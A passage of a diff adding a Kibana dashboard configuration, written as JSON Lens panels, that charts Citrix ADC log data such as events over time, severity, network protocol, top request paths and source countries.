"fe0867c1-6ca2-4dac-88ce-6f1b36a9d1bf", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "e2506703-c355-4307-9b8c-623fa77c78a6", + "layerType": "data", + "metricAccessor": "a95bb479-ae81-400c-a6bc-520017a50865" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 9, + "i": "6c5b6057-a76c-4a86-9ae5-5648e38c7b71", + "w": 12, + "x": 36, + "y": 9 + }, + "panelIndex": "6c5b6057-a76c-4a86-9ae5-5648e38c7b71", + "title": "Destination Bytes [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-771a3ae6-3454-44c5-8386-30e43d147b04", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9e48fe6b-c833-4cf4-82cc-8323783d52e1", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "771a3ae6-3454-44c5-8386-30e43d147b04": { + "columnOrder": [ + "ba5adb31-b2ef-4f81-8198-113f0a110634", + "2af89df4-37dc-4db9-9535-750816f7d0fc" + ], + "columns": { + "2af89df4-37dc-4db9-9535-750816f7d0fc": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Events", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "ba5adb31-b2ef-4f81-8198-113f0a110634": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "9e48fe6b-c833-4cf4-82cc-8323783d52e1", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "2af89df4-37dc-4db9-9535-750816f7d0fc" + ], + "layerId": "771a3ae6-3454-44c5-8386-30e43d147b04", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "ba5adb31-b2ef-4f81-8198-113f0a110634" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "4c8a3f96-6e7a-4bdb-acbe-f52e4f7dc6b2", + "w": 36, + "x": 12, + "y": 18 + }, + "panelIndex": "4c8a3f96-6e7a-4bdb-acbe-f52e4f7dc6b2", + "title": "Events Over Time [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-771a3ae6-3454-44c5-8386-30e43d147b04", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f2fd7484-cb11-4fe0-947b-a5c3e845e677", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "771a3ae6-3454-44c5-8386-30e43d147b04": { + "columnOrder": [ + "ba5adb31-b2ef-4f81-8198-113f0a110634", + "2af89df4-37dc-4db9-9535-750816f7d0fc" + ], + "columns": { + "2af89df4-37dc-4db9-9535-750816f7d0fc": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Severity", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "event.severity" + }, + "ba5adb31-b2ef-4f81-8198-113f0a110634": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "f2fd7484-cb11-4fe0-947b-a5c3e845e677", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "2af89df4-37dc-4db9-9535-750816f7d0fc" + ], + "layerId": "771a3ae6-3454-44c5-8386-30e43d147b04", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "ba5adb31-b2ef-4f81-8198-113f0a110634" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "7fd7a318-184d-4c0c-b0ee-b8958117a04a", + "w": 24, + "x": 0, + "y": 33 + }, + "panelIndex": "7fd7a318-184d-4c0c-b0ee-b8958117a04a", + "title": "Severity Over Time [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-1d85203e-e619-44d1-99eb-1890f1a7c084", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f1141519-608f-4767-96cc-24e8842474ca", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1d85203e-e619-44d1-99eb-1890f1a7c084": { + "columnOrder": [ + "be5e4478-ddff-4c4b-9783-7ab345a5ada0", + "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2" + ], + "columns": { + "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "be5e4478-ddff-4c4b-9783-7ab345a5ada0": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Network Transport", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 5 + }, + "scale": "ordinal", + "sourceField": "network.transport" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "f1141519-608f-4767-96cc-24e8842474ca", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "1d85203e-e619-44d1-99eb-1890f1a7c084", + "layerType": "data", + "legendDisplay": "show", + "metrics": [ + "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "be5e4478-ddff-4c4b-9783-7ab345a5ada0" + ], + "truncateLegend": false + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "b1a20813-82f1-4ba0-b295-695020f85209", + "w": 24, + "x": 24, + "y": 33 + }, + "panelIndex": "b1a20813-82f1-4ba0-b295-695020f85209", + "title": "Events by Network Transport [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-1d85203e-e619-44d1-99eb-1890f1a7c084", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9e133606-638d-42c5-a4ef-01ec82c06598", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1d85203e-e619-44d1-99eb-1890f1a7c084": { + "columnOrder": [ + "be5e4478-ddff-4c4b-9783-7ab345a5ada0", + "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2" + ], + "columns": { + "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "be5e4478-ddff-4c4b-9783-7ab345a5ada0": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Network Protocol", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "network.protocol" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "9e133606-638d-42c5-a4ef-01ec82c06598", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "1d85203e-e619-44d1-99eb-1890f1a7c084", + "layerType": "data", + "legendDisplay": "show", + "metrics": [ + "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "be5e4478-ddff-4c4b-9783-7ab345a5ada0" + ], + "truncateLegend": false + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "a2059241-c442-45ca-a3f9-9155480ec367", + "w": 24, + "x": 0, + "y": 48 + }, + "panelIndex": "a2059241-c442-45ca-a3f9-9155480ec367", + "title": "Events by Network Protocol [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-1d85203e-e619-44d1-99eb-1890f1a7c084", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cf79bd3f-262a-4663-8fff-63b00b87c34b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1d85203e-e619-44d1-99eb-1890f1a7c084": { + "columnOrder": [ + "be5e4478-ddff-4c4b-9783-7ab345a5ada0", + "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2" + ], + "columns": { + "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "be5e4478-ddff-4c4b-9783-7ab345a5ada0": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Priority", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 5 + }, + "scale": "ordinal", + "sourceField": "citrix.priority" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "cf79bd3f-262a-4663-8fff-63b00b87c34b", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "1d85203e-e619-44d1-99eb-1890f1a7c084", + "layerType": "data", + "legendDisplay": "show", + "metrics": [ + "6a128b22-f3d3-4eab-8f62-6f4ebcc8eca2" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "be5e4478-ddff-4c4b-9783-7ab345a5ada0" + ], + "truncateLegend": false + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "2df4dd1c-9b9c-411a-9aed-c37b6a535b78", + "w": 24, + "x": 24, + "y": 48 + }, + "panelIndex": "2df4dd1c-9b9c-411a-9aed-c37b6a535b78", + "title": "Events by Priority [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "813eba55-180f-41d5-9693-3bb4cbaa5b93", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "c9ccb6a3-5949-4684-ba32-c58cd71c456f": { + "columnOrder": [ + "3dfaccf6-7e23-41a7-ac37-28df731cf668", + "2811b187-15f5-43ce-9ade-c45af8a68fe2" + ], + "columns": { + "2811b187-15f5-43ce-9ade-c45af8a68fe2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "3dfaccf6-7e23-41a7-ac37-28df731cf668": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Request Domain", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "2811b187-15f5-43ce-9ade-c45af8a68fe2", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "url.domain" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "813eba55-180f-41d5-9693-3bb4cbaa5b93", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + "2811b187-15f5-43ce-9ade-c45af8a68fe2" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "3dfaccf6-7e23-41a7-ac37-28df731cf668" + ] + } + ], + "shape": "treemap" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "87d8f4ae-bff3-4541-93f6-5f0495b22354", + "w": 16, + "x": 0, + "y": 63 + }, + "panelIndex": "87d8f4ae-bff3-4541-93f6-5f0495b22354", + "title": "Top 10 Request Domain [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "0000c5e7-f881-4b37-84b1-5f87b3c39298", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "c9ccb6a3-5949-4684-ba32-c58cd71c456f": { + "columnOrder": [ + "3dfaccf6-7e23-41a7-ac37-28df731cf668", + "2811b187-15f5-43ce-9ade-c45af8a68fe2" + ], + "columns": { + "2811b187-15f5-43ce-9ade-c45af8a68fe2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "3dfaccf6-7e23-41a7-ac37-28df731cf668": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Request Path", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "2811b187-15f5-43ce-9ade-c45af8a68fe2", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "url.path" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "0000c5e7-f881-4b37-84b1-5f87b3c39298", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + "2811b187-15f5-43ce-9ade-c45af8a68fe2" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "3dfaccf6-7e23-41a7-ac37-28df731cf668" + ] + } + ], + "shape": "treemap" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "6362ec71-d94c-40ae-a3b0-6fd99a74f3fa", + "w": 16, + "x": 16, + "y": 63 + }, + "panelIndex": "6362ec71-d94c-40ae-a3b0-6fd99a74f3fa", + "title": "Top 10 Request Path [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c67b80ce-454e-4e6c-b76d-1b09a8fe8736", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "c9ccb6a3-5949-4684-ba32-c58cd71c456f": { + "columnOrder": [ + "3dfaccf6-7e23-41a7-ac37-28df731cf668", + "2811b187-15f5-43ce-9ade-c45af8a68fe2" + ], + "columns": { + "2811b187-15f5-43ce-9ade-c45af8a68fe2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "3dfaccf6-7e23-41a7-ac37-28df731cf668": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Request Query", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "2811b187-15f5-43ce-9ade-c45af8a68fe2", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "url.query" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "c67b80ce-454e-4e6c-b76d-1b09a8fe8736", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + "2811b187-15f5-43ce-9ade-c45af8a68fe2" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "3dfaccf6-7e23-41a7-ac37-28df731cf668" + ] + } + ], + "shape": "treemap" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "04dd2a49-ecb6-4a37-9ed1-ff4cb32e7315", + "w": 16, + "x": 32, + "y": 63 + }, + "panelIndex": "04dd2a49-ecb6-4a37-9ed1-ff4cb32e7315", + "title": "Top 10 Request Query [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "03db2a39-f594-4c99-9a96-4d0ea0803a78", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "c9ccb6a3-5949-4684-ba32-c58cd71c456f": { + "columnOrder": [ + "3dfaccf6-7e23-41a7-ac37-28df731cf668", + "2811b187-15f5-43ce-9ade-c45af8a68fe2" + ], + "columns": { + "2811b187-15f5-43ce-9ade-c45af8a68fe2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "3dfaccf6-7e23-41a7-ac37-28df731cf668": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Source Countries", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "2811b187-15f5-43ce-9ade-c45af8a68fe2", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "source.geo.country_name" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "03db2a39-f594-4c99-9a96-4d0ea0803a78", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + "2811b187-15f5-43ce-9ade-c45af8a68fe2" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "3dfaccf6-7e23-41a7-ac37-28df731cf668" + ] + } + ], + "shape": "treemap" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "6a0db5d9-5c35-4822-8be4-ba29d9e4a414", + "w": 24, + "x": 0, + "y": 78 + }, + "panelIndex": "6a0db5d9-5c35-4822-8be4-ba29d9e4a414", + "title": "Top 10 Source Countries [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6cf95b00-4a04-4ca9-94f4-877e91791676", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "c9ccb6a3-5949-4684-ba32-c58cd71c456f": { + "columnOrder": [ + "3dfaccf6-7e23-41a7-ac37-28df731cf668", + "2811b187-15f5-43ce-9ade-c45af8a68fe2" + ], + "columns": { + "2811b187-15f5-43ce-9ade-c45af8a68fe2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "3dfaccf6-7e23-41a7-ac37-28df731cf668": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Client Countries", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "2811b187-15f5-43ce-9ade-c45af8a68fe2", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "client.geo.country_name" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "6cf95b00-4a04-4ca9-94f4-877e91791676", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "citrix_adc.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "citrix_adc.log" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "layerType": "data", + "legendDisplay": "default", + "metrics": [ + "2811b187-15f5-43ce-9ade-c45af8a68fe2" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "3dfaccf6-7e23-41a7-ac37-28df731cf668" + ] + } + ], + "shape": "treemap" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "6339da61-ce3d-40ff-b7dc-4d5525f5ccf7", + "w": 24, + "x": 24, + "y": 78 + }, + "panelIndex": "6339da61-ce3d-40ff-b7dc-4d5525f5ccf7", + "title": "Top 10 Client Countries [Logs Citrix ADC]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": 